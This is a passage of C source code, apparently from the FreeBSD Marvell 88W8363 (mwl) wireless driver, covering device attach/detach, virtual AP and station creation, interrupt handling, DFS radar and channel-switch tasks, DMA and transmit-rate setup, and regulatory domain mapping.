MWL_DEBUG_KEYCACHE = 0x00000200, /* key cache management */ MWL_DEBUG_STATE = 0x00000400, /* 802.11 state transitions */ MWL_DEBUG_NODE = 0x00000800, /* node management */ MWL_DEBUG_RECV_ALL = 0x00001000, /* trace all frames (beacons) */ MWL_DEBUG_TSO = 0x00002000, /* TSO processing */ MWL_DEBUG_AMPDU = 0x00004000, /* BA stream handling */ MWL_DEBUG_ANY = 0xffffffff }; #define IS_BEACON(wh) \ ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK|IEEE80211_FC0_SUBTYPE_MASK)) == \ (IEEE80211_FC0_TYPE_MGT|IEEE80211_FC0_SUBTYPE_BEACON)) #define IFF_DUMPPKTS_RECV(sc, wh) \ (((sc->sc_debug & MWL_DEBUG_RECV) && \ ((sc->sc_debug & MWL_DEBUG_RECV_ALL) || !IS_BEACON(wh))) || \ (sc->sc_ifp->if_flags & (IFF_DEBUG|IFF_LINK2)) == (IFF_DEBUG|IFF_LINK2)) #define IFF_DUMPPKTS_XMIT(sc) \ ((sc->sc_debug & MWL_DEBUG_XMIT) || \ (sc->sc_ifp->if_flags & (IFF_DEBUG|IFF_LINK2)) == (IFF_DEBUG|IFF_LINK2)) #define DPRINTF(sc, m, fmt, ...) do { \ if (sc->sc_debug & (m)) \ printf(fmt, __VA_ARGS__); \ } while (0) #define KEYPRINTF(sc, hk, mac) do { \ if (sc->sc_debug & MWL_DEBUG_KEYCACHE) \ mwl_keyprint(sc, __func__, hk, mac); \ } while (0) static void mwl_printrxbuf(const struct mwl_rxbuf *bf, u_int ix); static void mwl_printtxbuf(const struct mwl_txbuf *bf, u_int qnum, u_int ix); #else #define IFF_DUMPPKTS_RECV(sc, wh) \ ((sc->sc_ifp->if_flags & (IFF_DEBUG|IFF_LINK2)) == (IFF_DEBUG|IFF_LINK2)) #define IFF_DUMPPKTS_XMIT(sc) \ ((sc->sc_ifp->if_flags & (IFF_DEBUG|IFF_LINK2)) == (IFF_DEBUG|IFF_LINK2)) #define DPRINTF(sc, m, fmt, ...) do { \ (void) sc; \ } while (0) #define KEYPRINTF(sc, k, mac) do { \ (void) sc; \ } while (0) #endif static MALLOC_DEFINE(M_MWLDEV, "mwldev", "mwl driver dma buffers"); /* * Each packet has fixed front matter: a 2-byte length * of the payload, followed by a 4-address 802.11 header * (regardless of the actual header and always w/o any * QoS header). The payload then follows. */ struct mwltxrec { uint16_t fwlen; struct ieee80211_frame_addr4 wh; } __packed; /* * Read/Write shorthands for accesses to BAR 0. Note * that all BAR 1 operations are done in the "hal" and * there should be no reference to them here. */ #ifdef MWL_DEBUG static __inline uint32_t RD4(struct mwl_softc *sc, bus_size_t off) { return bus_space_read_4(sc->sc_io0t, sc->sc_io0h, off); } #endif static __inline void WR4(struct mwl_softc *sc, bus_size_t off, uint32_t val) { bus_space_write_4(sc->sc_io0t, sc->sc_io0h, off, val); } int mwl_attach(uint16_t devid, struct mwl_softc *sc) { struct ifnet *ifp; struct ieee80211com *ic; struct mwl_hal *mh; int error = 0; DPRINTF(sc, MWL_DEBUG_ANY, "%s: devid 0x%x\n", __func__, devid); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "cannot if_alloc()\n"); return ENOSPC; } ic = ifp->if_l2com; /* * Setup the RX free list lock early, so it can be consistently * removed. */ MWL_RXFREE_INIT(sc); /* set these up early for if_printf use */ if_initname(ifp, device_get_name(sc->sc_dev), device_get_unit(sc->sc_dev)); mh = mwl_hal_attach(sc->sc_dev, devid, sc->sc_io1h, sc->sc_io1t, sc->sc_dmat); if (mh == NULL) { if_printf(ifp, "unable to attach HAL\n"); error = EIO; goto bad; } sc->sc_mh = mh; /* * Load firmware so we can get setup. We arbitrarily * pick station firmware; we'll re-load firmware as * needed so setting up the wrong mode isn't a big deal. 
*/ if (mwl_hal_fwload(mh, NULL) != 0) { if_printf(ifp, "unable to setup builtin firmware\n"); error = EIO; goto bad1; } if (mwl_hal_gethwspecs(mh, &sc->sc_hwspecs) != 0) { if_printf(ifp, "unable to fetch h/w specs\n"); error = EIO; goto bad1; } error = mwl_getchannels(sc); if (error != 0) goto bad1; sc->sc_txantenna = 0; /* h/w default */ sc->sc_rxantenna = 0; /* h/w default */ sc->sc_invalid = 0; /* ready to go, enable int handling */ sc->sc_ageinterval = MWL_AGEINTERVAL; /* * Allocate tx+rx descriptors and populate the lists. * We immediately push the information to the firmware * as otherwise it gets upset. */ error = mwl_dma_setup(sc); if (error != 0) { if_printf(ifp, "failed to setup descriptors: %d\n", error); goto bad1; } error = mwl_setupdma(sc); /* push to firmware */ if (error != 0) /* NB: mwl_setupdma prints msg */ goto bad1; callout_init(&sc->sc_timer, CALLOUT_MPSAFE); callout_init_mtx(&sc->sc_watchdog, &sc->sc_mtx, 0); sc->sc_tq = taskqueue_create("mwl_taskq", M_NOWAIT, taskqueue_thread_enqueue, &sc->sc_tq); taskqueue_start_threads(&sc->sc_tq, 1, PI_NET, "%s taskq", ifp->if_xname); TASK_INIT(&sc->sc_rxtask, 0, mwl_rx_proc, sc); TASK_INIT(&sc->sc_radartask, 0, mwl_radar_proc, sc); TASK_INIT(&sc->sc_chanswitchtask, 0, mwl_chanswitch_proc, sc); TASK_INIT(&sc->sc_bawatchdogtask, 0, mwl_bawatchdog_proc, sc); /* NB: insure BK queue is the lowest priority h/w queue */ if (!mwl_tx_setup(sc, WME_AC_BK, MWL_WME_AC_BK)) { if_printf(ifp, "unable to setup xmit queue for %s traffic!\n", ieee80211_wme_acnames[WME_AC_BK]); error = EIO; goto bad2; } if (!mwl_tx_setup(sc, WME_AC_BE, MWL_WME_AC_BE) || !mwl_tx_setup(sc, WME_AC_VI, MWL_WME_AC_VI) || !mwl_tx_setup(sc, WME_AC_VO, MWL_WME_AC_VO)) { /* * Not enough hardware tx queues to properly do WME; * just punt and assign them all to the same h/w queue. * We could do a better job of this if, for example, * we allocate queues when we switch from station to * AP mode. 
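 * For now the BE, VI and VO access categories below simply fall back to
 * the single hardware queue that was set up for BK.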
*/ if (sc->sc_ac2q[WME_AC_VI] != NULL) mwl_tx_cleanupq(sc, sc->sc_ac2q[WME_AC_VI]); if (sc->sc_ac2q[WME_AC_BE] != NULL) mwl_tx_cleanupq(sc, sc->sc_ac2q[WME_AC_BE]); sc->sc_ac2q[WME_AC_BE] = sc->sc_ac2q[WME_AC_BK]; sc->sc_ac2q[WME_AC_VI] = sc->sc_ac2q[WME_AC_BK]; sc->sc_ac2q[WME_AC_VO] = sc->sc_ac2q[WME_AC_BK]; } TASK_INIT(&sc->sc_txtask, 0, mwl_tx_proc, sc); ifp->if_softc = sc; ifp->if_flags = IFF_SIMPLEX | IFF_BROADCAST | IFF_MULTICAST; ifp->if_start = mwl_start; ifp->if_ioctl = mwl_ioctl; ifp->if_init = mwl_init; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; /* XXX not right but it's not used anywhere important */ ic->ic_phytype = IEEE80211_T_OFDM; ic->ic_opmode = IEEE80211_M_STA; ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_HOSTAP /* hostap mode */ | IEEE80211_C_MONITOR /* monitor mode */ #if 0 | IEEE80211_C_IBSS /* ibss, nee adhoc, mode */ | IEEE80211_C_AHDEMO /* adhoc demo mode */ #endif | IEEE80211_C_MBSS /* mesh point link mode */ | IEEE80211_C_WDS /* WDS supported */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_WME /* WME/WMM supported */ | IEEE80211_C_BURST /* xmit bursting supported */ | IEEE80211_C_WPA /* capable of WPA1+WPA2 */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ | IEEE80211_C_TXFRAG /* handle tx frags */ | IEEE80211_C_TXPMGT /* capable of txpow mgt */ | IEEE80211_C_DFS /* DFS supported */ ; ic->ic_htcaps = IEEE80211_HTCAP_SMPS_ENA /* SM PS mode enabled */ | IEEE80211_HTCAP_CHWIDTH40 /* 40MHz channel width */ | IEEE80211_HTCAP_SHORTGI20 /* short GI in 20MHz */ | IEEE80211_HTCAP_SHORTGI40 /* short GI in 40MHz */ | IEEE80211_HTCAP_RXSTBC_2STREAM/* 1-2 spatial streams */ #if MWL_AGGR_SIZE == 7935 | IEEE80211_HTCAP_MAXAMSDU_7935 /* max A-MSDU length */ #else | IEEE80211_HTCAP_MAXAMSDU_3839 /* max A-MSDU length */ #endif #if 0 | IEEE80211_HTCAP_PSMP /* PSMP supported */ | IEEE80211_HTCAP_40INTOLERANT /* 40MHz intolerant */ #endif /* s/w capabilities */ | IEEE80211_HTC_HT /* HT operation */ | IEEE80211_HTC_AMPDU /* tx A-MPDU */ | IEEE80211_HTC_AMSDU /* tx A-MSDU */ | IEEE80211_HTC_SMPS /* SMPS available */ ; /* * Mark h/w crypto support. * XXX no way to query h/w support. */ ic->ic_cryptocaps |= IEEE80211_CRYPTO_WEP | IEEE80211_CRYPTO_AES_CCM | IEEE80211_CRYPTO_TKIP | IEEE80211_CRYPTO_TKIPMIC ; /* * Transmit requires space in the packet for a special * format transmit record and optional padding between * this record and the payload. Ask the net80211 layer * to arrange this when encapsulating packets so we can * add it efficiently. */ ic->ic_headroom = sizeof(struct mwltxrec) - sizeof(struct ieee80211_frame); /* call MI attach routine. 
*/ ieee80211_ifattach(ic, sc->sc_hwspecs.macAddr); ic->ic_setregdomain = mwl_setregdomain; ic->ic_getradiocaps = mwl_getradiocaps; /* override default methods */ ic->ic_raw_xmit = mwl_raw_xmit; ic->ic_newassoc = mwl_newassoc; ic->ic_updateslot = mwl_updateslot; ic->ic_update_mcast = mwl_update_mcast; ic->ic_update_promisc = mwl_update_promisc; ic->ic_wme.wme_update = mwl_wme_update; ic->ic_node_alloc = mwl_node_alloc; sc->sc_node_cleanup = ic->ic_node_cleanup; ic->ic_node_cleanup = mwl_node_cleanup; sc->sc_node_drain = ic->ic_node_drain; ic->ic_node_drain = mwl_node_drain; ic->ic_node_getsignal = mwl_node_getsignal; ic->ic_node_getmimoinfo = mwl_node_getmimoinfo; ic->ic_scan_start = mwl_scan_start; ic->ic_scan_end = mwl_scan_end; ic->ic_set_channel = mwl_set_channel; sc->sc_recv_action = ic->ic_recv_action; ic->ic_recv_action = mwl_recv_action; sc->sc_addba_request = ic->ic_addba_request; ic->ic_addba_request = mwl_addba_request; sc->sc_addba_response = ic->ic_addba_response; ic->ic_addba_response = mwl_addba_response; sc->sc_addba_stop = ic->ic_addba_stop; ic->ic_addba_stop = mwl_addba_stop; ic->ic_vap_create = mwl_vap_create; ic->ic_vap_delete = mwl_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_tx_th.wt_ihdr, sizeof(sc->sc_tx_th), MWL_TX_RADIOTAP_PRESENT, &sc->sc_rx_th.wr_ihdr, sizeof(sc->sc_rx_th), MWL_RX_RADIOTAP_PRESENT); /* * Setup dynamic sysctl's now that country code and * regdomain are available from the hal. */ mwl_sysctlattach(sc); if (bootverbose) ieee80211_announce(ic); mwl_announce(sc); return 0; bad2: mwl_dma_cleanup(sc); bad1: mwl_hal_detach(mh); bad: MWL_RXFREE_DESTROY(sc); if_free(ifp); sc->sc_invalid = 1; return error; } int mwl_detach(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; DPRINTF(sc, MWL_DEBUG_ANY, "%s: if_flags %x\n", __func__, ifp->if_flags); mwl_stop(ifp, 1); /* * NB: the order of these is important: * o call the 802.11 layer before detaching the hal to * insure callbacks into the driver to delete global * key cache entries can be handled * o reclaim the tx queue data structures after calling * the 802.11 layer as we'll get called back to reclaim * node state and potentially want to use them * o to cleanup the tx queues the hal is called, so detach * it last * Other than that, it's straightforward... */ ieee80211_ifdetach(ic); callout_drain(&sc->sc_watchdog); mwl_dma_cleanup(sc); MWL_RXFREE_DESTROY(sc); mwl_tx_cleanup(sc); mwl_hal_detach(sc->sc_mh); if_free(ifp); return 0; } /* * MAC address handling for multiple BSS on the same radio. * The first vap uses the MAC address from the EEPROM. For * subsequent vap's we set the U/L bit (bit 1) in the MAC * address and use the next six bits as an index. 
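 *
 * A rough worked example (values are illustrative, not from the driver):
 * if the EEPROM address is 00:1b:2f:aa:bb:cc and a second vap is given
 * index i = 1, the first octet becomes
 *
 *	mac[0] = 0x00 | (1 << 2) | 0x02 = 0x06
 *
 * yielding 06:1b:2f:aa:bb:cc; the locally-administered (U/L) bit is set
 * and the index rides in the following bits, so it can be recovered
 * later as mac[0] >> 2 when the address is reclaimed.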
*/ static void assign_address(struct mwl_softc *sc, uint8_t mac[IEEE80211_ADDR_LEN], int clone) { int i; if (clone && mwl_hal_ismbsscapable(sc->sc_mh)) { /* NB: we only do this if h/w supports multiple bssid */ for (i = 0; i < 32; i++) if ((sc->sc_bssidmask & (1<<i)) == 0) break; if (i != 0) mac[0] |= (i << 2)|0x2; } else i = 0; sc->sc_bssidmask |= 1<<i; if (i == 0) sc->sc_nbssid0++; } static void reclaim_address(struct mwl_softc *sc, uint8_t mac[IEEE80211_ADDR_LEN]) { int i = mac[0] >> 2; if (i != 0 || --sc->sc_nbssid0 == 0) sc->sc_bssidmask &= ~(1<<i); } static struct ieee80211vap * mwl_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac0[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct mwl_softc *sc = ifp->if_softc; struct mwl_hal *mh = sc->sc_mh; struct ieee80211vap *vap, *apvap; struct mwl_hal_vap *hvap; struct mwl_vap *mvp; uint8_t mac[IEEE80211_ADDR_LEN]; IEEE80211_ADDR_COPY(mac, mac0); switch (opmode) { case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: if ((flags & IEEE80211_CLONE_MACADDR) == 0) assign_address(sc, mac, flags & IEEE80211_CLONE_BSSID); hvap = mwl_hal_newvap(mh, MWL_HAL_AP, mac); if (hvap == NULL) { if ((flags & IEEE80211_CLONE_MACADDR) == 0) reclaim_address(sc, mac); return NULL; } break; case IEEE80211_M_STA: if ((flags & IEEE80211_CLONE_MACADDR) == 0) assign_address(sc, mac, flags & IEEE80211_CLONE_BSSID); hvap = mwl_hal_newvap(mh, MWL_HAL_STA, mac); if (hvap == NULL) { if ((flags & IEEE80211_CLONE_MACADDR) == 0) reclaim_address(sc, mac); return NULL; } /* no h/w beacon miss support; always use s/w */ flags |= IEEE80211_CLONE_NOBEACONS; break; case IEEE80211_M_WDS: hvap = NULL; /* NB: we use associated AP vap */ if (sc->sc_napvaps == 0) return NULL; /* no existing AP vap */ break; case IEEE80211_M_MONITOR: hvap = NULL; break; case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: default: return NULL; } mvp = (struct mwl_vap *) malloc(sizeof(struct mwl_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (mvp == NULL) { if (hvap != NULL) { mwl_hal_delvap(hvap); if ((flags & IEEE80211_CLONE_MACADDR) == 0) reclaim_address(sc, mac); } /* XXX msg */ return NULL; } mvp->mv_hvap = hvap; if (opmode == IEEE80211_M_WDS) { /* * WDS vaps must have an associated AP vap; find one. * XXX not right. */ TAILQ_FOREACH(apvap, &ic->ic_vaps, iv_next) if (apvap->iv_opmode == IEEE80211_M_HOSTAP) { mvp->mv_ap_hvap = MWL_VAP(apvap)->mv_hvap; break; } KASSERT(mvp->mv_ap_hvap != NULL, ("no ap vap")); } vap = &mvp->mv_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); if (hvap != NULL) IEEE80211_ADDR_COPY(vap->iv_myaddr, mac); /* override with driver methods */ mvp->mv_newstate = vap->iv_newstate; vap->iv_newstate = mwl_newstate; vap->iv_max_keyix = 0; /* XXX */ vap->iv_key_alloc = mwl_key_alloc; vap->iv_key_delete = mwl_key_delete; vap->iv_key_set = mwl_key_set; #ifdef MWL_HOST_PS_SUPPORT if (opmode == IEEE80211_M_HOSTAP || opmode == IEEE80211_M_MBSS) { vap->iv_update_ps = mwl_update_ps; mvp->mv_set_tim = vap->iv_set_tim; vap->iv_set_tim = mwl_set_tim; } #endif vap->iv_reset = mwl_reset; vap->iv_update_beacon = mwl_beacon_update; /* override max aid so sta's cannot assoc when we're out of sta id's */ vap->iv_max_aid = MWL_MAXSTAID; /* override default A-MPDU rx parameters */ vap->iv_ampdu_rxmax = IEEE80211_HTCAP_MAXRXAMPDU_64K; vap->iv_ampdu_density = IEEE80211_HTCAP_MPDUDENSITY_4; /* complete setup */ ieee80211_vap_attach(vap, mwl_media_change, ieee80211_media_status); switch (vap->iv_opmode) { case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: case IEEE80211_M_STA: /* * Setup sta db entry for local address.
*/ mwl_localstadb(vap); if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_MBSS) sc->sc_napvaps++; else sc->sc_nstavaps++; break; case IEEE80211_M_WDS: sc->sc_nwdsvaps++; break; default: break; } /* * Setup overall operating mode. */ if (sc->sc_napvaps) ic->ic_opmode = IEEE80211_M_HOSTAP; else if (sc->sc_nstavaps) ic->ic_opmode = IEEE80211_M_STA; else ic->ic_opmode = opmode; return vap; } static void mwl_vap_delete(struct ieee80211vap *vap) { struct mwl_vap *mvp = MWL_VAP(vap); struct ifnet *parent = vap->iv_ic->ic_ifp; struct mwl_softc *sc = parent->if_softc; struct mwl_hal *mh = sc->sc_mh; struct mwl_hal_vap *hvap = mvp->mv_hvap; enum ieee80211_opmode opmode = vap->iv_opmode; /* XXX disallow ap vap delete if WDS still present */ if (parent->if_drv_flags & IFF_DRV_RUNNING) { /* quiesce h/w while we remove the vap */ mwl_hal_intrset(mh, 0); /* disable interrupts */ } ieee80211_vap_detach(vap); switch (opmode) { case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: case IEEE80211_M_STA: KASSERT(hvap != NULL, ("no hal vap handle")); (void) mwl_hal_delstation(hvap, vap->iv_myaddr); mwl_hal_delvap(hvap); if (opmode == IEEE80211_M_HOSTAP || opmode == IEEE80211_M_MBSS) sc->sc_napvaps--; else sc->sc_nstavaps--; /* XXX don't do it for IEEE80211_CLONE_MACADDR */ reclaim_address(sc, vap->iv_myaddr); break; case IEEE80211_M_WDS: sc->sc_nwdsvaps--; break; default: break; } mwl_cleartxq(sc, vap); free(mvp, M_80211_VAP); if (parent->if_drv_flags & IFF_DRV_RUNNING) mwl_hal_intrset(mh, sc->sc_imask); } void mwl_suspend(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; DPRINTF(sc, MWL_DEBUG_ANY, "%s: if_flags %x\n", __func__, ifp->if_flags); mwl_stop(ifp, 1); } void mwl_resume(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; DPRINTF(sc, MWL_DEBUG_ANY, "%s: if_flags %x\n", __func__, ifp->if_flags); if (ifp->if_flags & IFF_UP) mwl_init(sc); } void mwl_shutdown(void *arg) { struct mwl_softc *sc = arg; mwl_stop(sc->sc_ifp, 1); } /* * Interrupt handler. Most of the actual processing is deferred. */ void mwl_intr(void *arg) { struct mwl_softc *sc = arg; struct mwl_hal *mh = sc->sc_mh; uint32_t status; if (sc->sc_invalid) { /* * The hardware is not ready/present, don't touch anything. * Note this can happen early on if the IRQ is shared. */ DPRINTF(sc, MWL_DEBUG_ANY, "%s: invalid; ignored\n", __func__); return; } /* * Figure out the reason(s) for the interrupt. 
*/ mwl_hal_getisr(mh, &status); /* NB: clears ISR too */ if (status == 0) /* must be a shared irq */ return; DPRINTF(sc, MWL_DEBUG_INTR, "%s: status 0x%x imask 0x%x\n", __func__, status, sc->sc_imask); if (status & MACREG_A2HRIC_BIT_RX_RDY) taskqueue_enqueue(sc->sc_tq, &sc->sc_rxtask); if (status & MACREG_A2HRIC_BIT_TX_DONE) taskqueue_enqueue(sc->sc_tq, &sc->sc_txtask); if (status & MACREG_A2HRIC_BIT_BA_WATCHDOG) taskqueue_enqueue(sc->sc_tq, &sc->sc_bawatchdogtask); if (status & MACREG_A2HRIC_BIT_OPC_DONE) mwl_hal_cmddone(mh); if (status & MACREG_A2HRIC_BIT_MAC_EVENT) { ; } if (status & MACREG_A2HRIC_BIT_ICV_ERROR) { /* TKIP ICV error */ sc->sc_stats.mst_rx_badtkipicv++; } if (status & MACREG_A2HRIC_BIT_QUEUE_EMPTY) { /* 11n aggregation queue is empty, re-fill */ ; } if (status & MACREG_A2HRIC_BIT_QUEUE_FULL) { ; } if (status & MACREG_A2HRIC_BIT_RADAR_DETECT) { /* radar detected, process event */ taskqueue_enqueue(sc->sc_tq, &sc->sc_radartask); } if (status & MACREG_A2HRIC_BIT_CHAN_SWITCH) { /* DFS channel switch */ taskqueue_enqueue(sc->sc_tq, &sc->sc_chanswitchtask); } } static void mwl_radar_proc(void *arg, int pending) { struct mwl_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; DPRINTF(sc, MWL_DEBUG_ANY, "%s: radar detected, pending %u\n", __func__, pending); sc->sc_stats.mst_radardetect++; /* XXX stop h/w BA streams? */ IEEE80211_LOCK(ic); ieee80211_dfs_notify_radar(ic, ic->ic_curchan); IEEE80211_UNLOCK(ic); } static void mwl_chanswitch_proc(void *arg, int pending) { struct mwl_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; DPRINTF(sc, MWL_DEBUG_ANY, "%s: channel switch notice, pending %u\n", __func__, pending); IEEE80211_LOCK(ic); sc->sc_csapending = 0; ieee80211_csa_completeswitch(ic); IEEE80211_UNLOCK(ic); } static void mwl_bawatchdog(const MWL_HAL_BASTREAM *sp) { struct ieee80211_node *ni = sp->data[0]; /* send DELBA and drop the stream */ ieee80211_ampdu_stop(ni, sp->data[1], IEEE80211_REASON_UNSPECIFIED); } static void mwl_bawatchdog_proc(void *arg, int pending) { struct mwl_softc *sc = arg; struct mwl_hal *mh = sc->sc_mh; const MWL_HAL_BASTREAM *sp; uint8_t bitmap, n; sc->sc_stats.mst_bawatchdog++; if (mwl_hal_getwatchdogbitmap(mh, &bitmap) != 0) { DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: could not get bitmap\n", __func__); sc->sc_stats.mst_bawatchdog_failed++; return; } DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: bitmap 0x%x\n", __func__, bitmap); if (bitmap == 0xff) { n = 0; /* disable all ba streams */ for (bitmap = 0; bitmap < 8; bitmap++) { sp = mwl_hal_bastream_lookup(mh, bitmap); if (sp != NULL) { mwl_bawatchdog(sp); n++; } } if (n == 0) { DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: no BA streams found\n", __func__); sc->sc_stats.mst_bawatchdog_empty++; } } else if (bitmap != 0xaa) { /* disable a single ba stream */ sp = mwl_hal_bastream_lookup(mh, bitmap); if (sp != NULL) { mwl_bawatchdog(sp); } else { DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: no BA stream %d\n", __func__, bitmap); sc->sc_stats.mst_bawatchdog_notfound++; } } } /* * Convert net80211 channel to a HAL channel. 
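 *
 * For example (illustrative values): an HT40U 5GHz channel with
 * ic_ieee = 36 maps to
 *
 *	hc->channel = 36;
 *	hc->channelFlags.FreqBand = MWL_FREQ_BAND_5GHZ;
 *	hc->channelFlags.ChnlWidth = MWL_CH_40_MHz_WIDTH;
 *	hc->channelFlags.ExtChnlOffset = MWL_EXT_CH_ABOVE_CTRL_CH;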
*/ static void mwl_mapchan(MWL_HAL_CHANNEL *hc, const struct ieee80211_channel *chan) { hc->channel = chan->ic_ieee; *(uint32_t *)&hc->channelFlags = 0; if (IEEE80211_IS_CHAN_2GHZ(chan)) hc->channelFlags.FreqBand = MWL_FREQ_BAND_2DOT4GHZ; else if (IEEE80211_IS_CHAN_5GHZ(chan)) hc->channelFlags.FreqBand = MWL_FREQ_BAND_5GHZ; if (IEEE80211_IS_CHAN_HT40(chan)) { hc->channelFlags.ChnlWidth = MWL_CH_40_MHz_WIDTH; if (IEEE80211_IS_CHAN_HT40U(chan)) hc->channelFlags.ExtChnlOffset = MWL_EXT_CH_ABOVE_CTRL_CH; else hc->channelFlags.ExtChnlOffset = MWL_EXT_CH_BELOW_CTRL_CH; } else hc->channelFlags.ChnlWidth = MWL_CH_20_MHz_WIDTH; /* XXX 10MHz channels */ } /* * Inform firmware of our tx/rx dma setup. The BAR 0 * writes below are for compatibility with older firmware. * For current firmware we send this information with a * cmd block via mwl_hal_sethwdma. */ static int mwl_setupdma(struct mwl_softc *sc) { int error, i; sc->sc_hwdma.rxDescRead = sc->sc_rxdma.dd_desc_paddr; WR4(sc, sc->sc_hwspecs.rxDescRead, sc->sc_hwdma.rxDescRead); WR4(sc, sc->sc_hwspecs.rxDescWrite, sc->sc_hwdma.rxDescRead); for (i = 0; i < MWL_NUM_TX_QUEUES-MWL_NUM_ACK_QUEUES; i++) { struct mwl_txq *txq = &sc->sc_txq[i]; sc->sc_hwdma.wcbBase[i] = txq->dma.dd_desc_paddr; WR4(sc, sc->sc_hwspecs.wcbBase[i], sc->sc_hwdma.wcbBase[i]); } sc->sc_hwdma.maxNumTxWcb = mwl_txbuf; sc->sc_hwdma.maxNumWCB = MWL_NUM_TX_QUEUES-MWL_NUM_ACK_QUEUES; error = mwl_hal_sethwdma(sc->sc_mh, &sc->sc_hwdma); if (error != 0) { device_printf(sc->sc_dev, "unable to setup tx/rx dma; hal status %u\n", error); /* XXX */ } return error; } /* * Inform firmware of tx rate parameters. * Called after a channel change. */ static int mwl_setcurchanrates(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct ieee80211_rateset *rs; MWL_HAL_TXRATE rates; memset(&rates, 0, sizeof(rates)); rs = ieee80211_get_suprates(ic, ic->ic_curchan); /* rate used to send management frames */ rates.MgtRate = rs->rs_rates[0] & IEEE80211_RATE_VAL; /* rate used to send multicast frames */ rates.McastRate = rates.MgtRate; return mwl_hal_settxrate_auto(sc->sc_mh, &rates); } /* * Inform firmware of tx rate parameters. Called whenever * user-settable params change and after a channel change. */ static int mwl_setrates(struct ieee80211vap *vap) { struct mwl_vap *mvp = MWL_VAP(vap); struct ieee80211_node *ni = vap->iv_bss; const struct ieee80211_txparam *tp = ni->ni_txparms; MWL_HAL_TXRATE rates; KASSERT(vap->iv_state == IEEE80211_S_RUN, ("state %d", vap->iv_state)); /* * Update the h/w rate map. * NB: 0x80 for MCS is passed through unchanged */ memset(&rates, 0, sizeof(rates)); /* rate used to send management frames */ rates.MgtRate = tp->mgmtrate; /* rate used to send multicast frames */ rates.McastRate = tp->mcastrate; /* while here calculate EAPOL fixed rate cookie */ mvp->mv_eapolformat = htole16(mwl_calcformat(rates.MgtRate, ni)); return mwl_hal_settxrate(mvp->mv_hvap, tp->ucastrate != IEEE80211_FIXED_RATE_NONE ? RATE_FIXED : RATE_AUTO, &rates); } /* * Setup a fixed xmit rate cookie for EAPOL frames. */ static void mwl_seteapolformat(struct ieee80211vap *vap) { struct mwl_vap *mvp = MWL_VAP(vap); struct ieee80211_node *ni = vap->iv_bss; enum ieee80211_phymode mode; uint8_t rate; KASSERT(vap->iv_state == IEEE80211_S_RUN, ("state %d", vap->iv_state)); mode = ieee80211_chan2mode(ni->ni_chan); /* * Use legacy rates when operating a mixed HT+non-HT bss. * NB: this may violate POLA for sta and wds vap's. 
*/ if (mode == IEEE80211_MODE_11NA && (vap->iv_flags_ht & IEEE80211_FHT_PUREN) == 0) rate = vap->iv_txparms[IEEE80211_MODE_11A].mgmtrate; else if (mode == IEEE80211_MODE_11NG && (vap->iv_flags_ht & IEEE80211_FHT_PUREN) == 0) rate = vap->iv_txparms[IEEE80211_MODE_11G].mgmtrate; else rate = vap->iv_txparms[mode].mgmtrate; mvp->mv_eapolformat = htole16(mwl_calcformat(rate, ni)); } /* * Map SKU+country code to region code for radar bin'ing. */ static int mwl_map2regioncode(const struct ieee80211_regdomain *rd) { switch (rd->regdomain) { case SKU_FCC: case SKU_FCC3: return DOMAIN_CODE_FCC; case SKU_CA: return DOMAIN_CODE_IC; case SKU_ETSI: case SKU_ETSI2: case SKU_ETSI3: if (rd->country == CTRY_SPAIN) return DOMAIN_CODE_SPAIN; if (rd->country == CTRY_FRANCE || rd->country == CTRY_FRANCE2) return DOMAIN_CODE_FRANCE; /* XXX force 1.3.1 radar type */ return DOMAIN_CODE_ETSI_131; case SKU_JAPAN: return DOMAIN_CODE_MKK; case SKU_ROW: return DOMAIN_CODE_DGT; /* Taiwan */ case SKU_APAC: case SKU_APAC2: case SKU_APAC3: return DOMAIN_CODE_AUS; /* Australia */ } /* XXX KOREA? */ return DOMAIN_CODE_FCC; /* XXX? */ } static int mwl_hal_reset(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct mwl_hal *mh = sc->sc_mh; mwl_hal_setantenna(mh, WL_ANTENNATYPE_RX, sc->sc_rxantenna); mwl_hal_setantenna(mh, WL_ANTENNATYPE_TX, sc->sc_txantenna); mwl_hal_setradio(mh, 1, WL_AUTO_PREAMBLE); mwl_hal_setwmm(sc->sc_mh, (ic->ic_flags & IEEE80211_F_WME) != 0); mwl_chan_set(sc, ic->ic_curchan); /* NB: RF/RA performance tuned for indoor mode */ mwl_hal_setrateadaptmode(mh, 0); mwl_hal_setoptimizationlevel(mh, (ic->ic_flags & IEEE80211_F_BURST) != 0); 